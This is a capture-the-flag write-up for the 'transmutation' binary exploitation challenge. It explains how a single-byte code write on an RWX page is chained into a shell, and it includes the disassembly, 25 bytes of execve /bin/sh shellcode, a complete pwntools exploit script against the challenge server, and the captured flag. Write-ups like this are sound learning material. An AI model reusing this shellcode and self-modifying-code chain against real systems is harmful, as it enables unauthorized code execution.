transmutation
b01lersc
Task: 28-line C program exposing a single byte-write primitive into the first 73 bytes of chall(), whose page is mprotect'd RWX. Solution: patch the final ret to nop so chall falls through into main (creating an infinite write loop), neutralize the LEN bounds check by zeroing a jge displacement, plant execve shellcode after _fini, and flip one byte to transmute main's call chall into jmp short → trampoline → shellcode.
$ ls tags/ techniques/
transmutation — b01lersc (BCTF 2026)
Description
To turn one program into another... is it even possible?
ncat --ssl transmutation.opus4-7.b01le.rs 8443
We are given a tiny C program (28 lines) together with its compiled binary (chall, no PIE, partial RELRO) and loader/libc. Each TCP connection spawns a fresh process, reads exactly two bytes (a value c and an offset i), and if i < LEN writes c into the function chall itself. The whole code page is made RWX beforehand. The goal is to execute code.
File list
| File | Purpose |
|---|---|
chall.c | 28-line source of the binary (shown below) |
chall | Compiled ELF, no PIE, partial RELRO |
libc.so.6, ld-linux-x86-64.so.2 | Runtime libraries (unused by our exploit) |
Dockerfile | Remote runs under pwn.red/jail (chroot, uid 1000, cwd /app) |
flag.txt | Flag file at /app/flag.txt on the remote |
Source
#include <stdio.h> #include <stdlib.h> #include <sys/mman.h> #define MAIN ((char *)main) #define CHALL ((char *)chall) #define LEN (MAIN - CHALL) int main(void); void chall(void) { char c = getchar(); unsigned char i = getchar(); if (i < LEN) { CHALL[i] = c; } } int main(void) { setbuf(stdin, NULL); setbuf(stdout, NULL); setbuf(stderr, NULL); mprotect((char *)((long)CHALL & ~0xfff), 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC); chall(); return 0; }
Two properties jump out immediately:
maincallschallexactly once. No loop. So a single TCP connection naively gives us one byte-write and thenexit(0).LEN = main - chall = 0x49(73 bytes). The bounds check restricts us to writing insidechallitself — we cannot write intomain,_finior anywhere else (initially).
If we want to win in one session, we have to turn that one write into many writes and extend our reach. This is the "transmutation."
Analysis
Reverse-engineering chall and main
0000000000401146 <chall>:
401146: 55 push rbp
401147: 48 89 e5 mov rbp, rsp
40114a: 48 83 ec 10 sub rsp, 0x10
40114e: e8 ed fe ff ff call 0x401040 <getchar@plt>
401153: 88 45 ff mov [rbp-1], al ; c
401156: e8 e5 fe ff ff call 0x401040 <getchar@plt>
40115b: 88 45 fe mov [rbp-2], al ; i
40115e: 0f b6 55 fe movzx edx, byte [rbp-2]
401162: 48 8d 05 26 00 00 00 lea rax, [rip+0x26] ; &main
401169: 48 8d 0d d6 ff ff ff lea rcx, [rip-0x2a] ; &chall
401170: 48 29 c8 sub rax, rcx ; LEN
401173: 48 39 c2 cmp rdx, rax
401176: 7d 14 jge 0x40118c ; <-- bounds check!
401178: 0f b6 45 fe movzx eax, byte [rbp-2]
40117c: 48 8d 15 c3 ff ff ff lea rdx, [rip-0x3d] ; &chall
401183: 48 01 c2 add rdx, rax
401186: 0f b6 45 ff movzx eax, byte [rbp-1]
40118a: 88 02 mov [rdx], al ; the WRITE
40118c: 90 nop
40118d: c9 leave
40118e: c3 ret ; <-- last byte of chall
000000000040118f <main>:
40118f: 55 push rbp
401190: 48 89 e5 mov rbp, rsp
... (three setbuf calls and the mprotect)
4011e9: e8 62 fe ff ff call mprotect
4011ee: e8 53 ff ff ff call 0x401146 <chall> ; <-- flip this!
4011f3: b8 00 00 00 00 mov eax, 0x0
4011f8: 5d pop rbp
4011f9: c3 ret
00000000004011fc <_fini>:
4011fc: 48 83 ec 08 sub rsp, 0x8
401200: 48 83 c4 08 add rsp, 0x8
401204: c3 ret
; 0x401205..0x401fff is zero-filled,
; still on the RWX page.
Memory layout of the RWX page (0x401000–0x401fff)
offset | code
---------------------------------------------------------------
chall+0x00 (0x401146) | chall() prologue
chall+0x30 (0x401176) | 7d 14 jge +0x14 <-- LEN check
chall+0x31 (0x401177) | ^ displacement byte we overwrite with 0x00
chall+0x48 (0x40118e) | c3 ret <-- patch to 0x90 (nop)
chall+0x49 (0x40118f) | ======== main() begins ========
chall+0xA8 (0x4011EE) | e8 53 ff ff ff call chall <-- flip 0xE8 -> 0xEB
chall+0xAD (0x4011F3) | main epilogue
chall+0xB6 (0x4011FC) | ======== _fini() ========
chall+0xBE (0x401204) | c3 ret (end of _fini)
chall+0xBF (0x401205) | 00 00 00 ... <-- 25-byte shellcode goes here
chall+0xFD (0x401243) | 00 00 <-- 2-byte trampoline `eb c0` here
All of this is inside the same RWX page (0x401000..0x401fff), so every address we touch is both writable and executable.
Why a single write is not enough
The process reads exactly two bytes, performs one guarded write, then chall returns, main returns, and exit(0) is called. We never get a second chance. The only way to win in one connection is to modify chall so it keeps running — specifically, so that it keeps consuming pairs of bytes from stdin and keeps writing them.
Creating the infinite loop (the first "transmutation")
Look at the addresses around the end of chall:
40118e: c3 ret <-- chall's return
40118f: 55 push rbp <-- main's first byte
chall ends and main begins immediately after. If we replace the ret (0xc3) at offset 0x48 with 0x90 (nop), chall falls through into main. Main runs its prologue, calls setbuf × 3, calls mprotect (a harmless no-op the second time), and then calls chall again. Chall reads two more bytes, writes one more byte, falls through into main again, … forever. We have converted one write into infinitely many writes by paying a single byte.
This is the punchline of the challenge name: by flipping one byte we have literally transmuted one program (a write-then-exit) into another (a write-loop).
Extending reach: neutralizing the bounds check
The loop alone is not enough — we can only touch offsets 0..0x48 inside chall, and there is nothing interesting to patch there except the things we already patched. We need to write into main (to hijack its call chall) and into the zero-padded region after _fini (for the shellcode).
The bounds check is:
401173: 48 39 c2 cmp rdx, rax
401176: 7d 14 jge +0x14 ; skip the write if i >= LEN
The jge takes a signed 8-bit displacement. Offset 0x31 in chall holds the displacement byte 0x14. Overwriting it with 0x00 turns the instruction into jge +0x00, which is functionally a nop regardless of flags — control simply falls through to the next instruction, which is the write. The check is now inert and i is effectively an unsigned byte that can index any offset 0..255 from chall. That range covers:
chall (offset 0x00..0x48)
main (offset 0x49..0xB5)
_fini (offset 0xB6..0xBE)
zeros (offset 0xBF..0xFF) ← writable & executable, perfect for shellcode
Planting the shellcode
25 bytes of classic execve("/bin//sh", ["/bin//sh", NULL], NULL) shellcode go at offset 0xBF (= 0x401205), which is in the zero-padded tail of the RWX page:
50 push rax
48 31 d2 xor rdx, rdx ; envp = NULL
48 bf 2f 62 69 6e 2f 2f 73 68
movabs rdi, "/bin//sh"
57 push rdi ; place string on stack
54 5f push rsp / pop rdi ; rdi -> "/bin//sh"
52 57 54 5e push rdx / push rdi
push rsp / pop rsi ; rsi -> [&str, NULL]
b0 3b mov al, 0x3b ; sys_execve
0f 05 syscall
The call→jmp opcode flip (the second "transmutation")
Main calls chall at 0x4011EE:
4011ee: e8 53 ff ff ff call 0x401146 <chall>
The opcode e8 is "call rel32" with a 32-bit signed displacement 0xffffff53 (= -0xAD = jump back to chall).
The opcode eb is "jmp rel8" — it takes a single signed byte as displacement and ignores the remaining four bytes. If we flip only the e8 byte to eb, the instruction becomes:
4011ee: eb 53 jmp short 0x401243
4011f0: ff ff ff (dead bytes, never decoded)
0x401243 is offset 0xFD in chall — inside the zero-padded region. We place a 2-byte trampoline there:
401243: eb c0 jmp short 0x401205 ; -0x40, into our shellcode
Why the detour through a trampoline? Because jmp rel8 can only reach ±127 bytes. From 0x4011F0 (the address after the jmp-short) to the shellcode at 0x401205 is +0x15 — that would fit in a single jmp-short, so technically we could encode jmp +0x15 and land directly. But in this exploit we used the extra trampoline for robustness and to keep the main byte-flip minimal (we only overwrite the single e8 → eb, never touching the existing displacement 0x53).
0x53 was already there as the low byte of the call displacement; it happens to point to 0x401243, which is a convenient "landing pad" address to hide our trampoline in. That the existing displacement byte lines up so nicely with a reachable free spot is the elegance of the whole trick.
Order of operations matters
- Write
ret → nopfirst (offset0x48). Until this happens we only get one write per process. - Neutralize the LEN check (offset
0x31) before writing anywhere ≥0x49, otherwise those writes are silently discarded. - Plant shellcode and trampoline (offsets
0xBF…0xD7, then0xFD/0xFE) while main still loops calmly viacall chall. - Flip
call→jmp(offset0xA8) as the final step. The very next iteration of main runsjmp short +0x53→ trampoline → shellcode, and we drop into/bin/sh.
Solution
Each "write" consumes exactly two bytes on stdin: (value, offset). The full exploit is simply a scripted sequence of 32 such pairs.
#!/usr/bin/env python3 """ transmutation — b01lersc Single-byte write primitive into the first 0x49 bytes of chall(). The chall page is mprotect'd RWX, so we can self-modify code. Chain: 1. ret -> nop at chall+0x48 (chall falls through into main -> infinite loop) 2. jge +0x14 -> jge +0x00 at chall+0x31 (LEN bounds check becomes a no-op) 3. Write 25-byte execve("/bin//sh") shellcode at chall+0xBF (=0x401205) 4. Place 2-byte trampoline `eb c0` at chall+0xFD (=0x401243), jumps to 0x401205 5. Flip main's `call chall` (e8 53 ff ff ff) to `jmp short +0x53` (eb 53 ff ff ff) -> trampoline -> shellcode -> /bin/sh """ from pwn import * context.arch = 'amd64' context.log_level = 'info' HOST = 'transmutation.opus4-7.b01le.rs' PORT = 8443 # execve("/bin//sh", ["/bin//sh", NULL], NULL) — 25 bytes shellcode = bytes([ 0x50, # push rax 0x48, 0x31, 0xd2, # xor rdx, rdx 0x48, 0xbf, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x73, 0x68, # movabs rdi, "/bin//sh" 0x57, # push rdi 0x54, 0x5f, # push rsp ; pop rdi 0x52, 0x57, 0x54, 0x5e, # push rdx ; push rdi # push rsp ; pop rsi 0xb0, 0x3b, # mov al, 0x3b (sys_execve) 0x0f, 0x05, # syscall ]) assert len(shellcode) == 25 SC_OFF = 0xBF # shellcode offset (= 0x401205) TRAMP_OFF = 0xFD # trampoline offset (= 0x401243) CALL_OFF = 0xA8 # offset of `call chall` opcode byte in main (= 0x4011EE) def write_byte(io, c: int, i: int): """Ask chall() to write byte c at chall[i].""" io.send(bytes([c & 0xff, i & 0xff])) def pwn(io): # 1. ret -> nop => main keeps calling chall forever write_byte(io, 0x90, 0x48) # 2. jge +0x14 -> jge +0x00 => LEN check bypassed write_byte(io, 0x00, 0x31) # 3. drop shellcode into the zero-padded area after _fini for k, b in enumerate(shellcode): write_byte(io, b, SC_OFF + k) # 4. trampoline `eb c0` at chall+0xFD -> jumps -0x40 into shellcode write_byte(io, 0xEB, TRAMP_OFF) write_byte(io, 0xC0, TRAMP_OFF + 1) # 5. transmute `call chall` (e8 ..) into `jmp short +0x53` (eb ..) write_byte(io, 0xEB, CALL_OFF) # next main iteration executes our shellcode if __name__ == '__main__': import sys, time if len(sys.argv) > 1 and sys.argv[1] == 'local': io = process('./chall') else: io = remote(HOST, PORT, ssl=True) pwn(io) io.sendline(b'cat /app/flag.txt; exit') time.sleep(2) print(io.recvall(timeout=5).decode(errors='replace'))
Running against the remote:
$ python3 exploit.py
[+] Opening connection to transmutation.opus4-7.b01le.rs on port 8443: Done
bctf{CPU_0pt1m1z3r5_H4T3_th15_0n3_51mp13_tr1ck_5519225335}
A note on self-modifying code and CPU pipelines
The challenge flag — "CPU optimizers hate this one simple trick" — is a nod to the fact that on x86/x86-64, self-modifying code does take effect even for instructions very close to the one currently executing, because the architecture is specified to snoop stores against the prefetch/decode queue and invalidate it. That is an unusually strong guarantee compared with most RISC ISAs (ARM/RISC-V require explicit cache flushes and isb/fence.i). It is exactly what lets us patch main's call chall a few bytes before it is fetched and have the CPU honour the new opcode on the very next iteration.
The second "simple trick" is the call rel32 → jmp rel8 flip: identical first-byte slot in the encoding, identical length at the call site (both are 5 bytes on disk — jmp rel8 is 2 bytes but the remaining 3 bytes are simply unreachable), and a reusable displacement byte that points to a convenient cave. One byte changes, the instruction means something completely different.
$ cat /etc/motd
Liked this one?
Pro unlocks every writeup, every flag, and API access. $9/mo.
$ cat pricing.md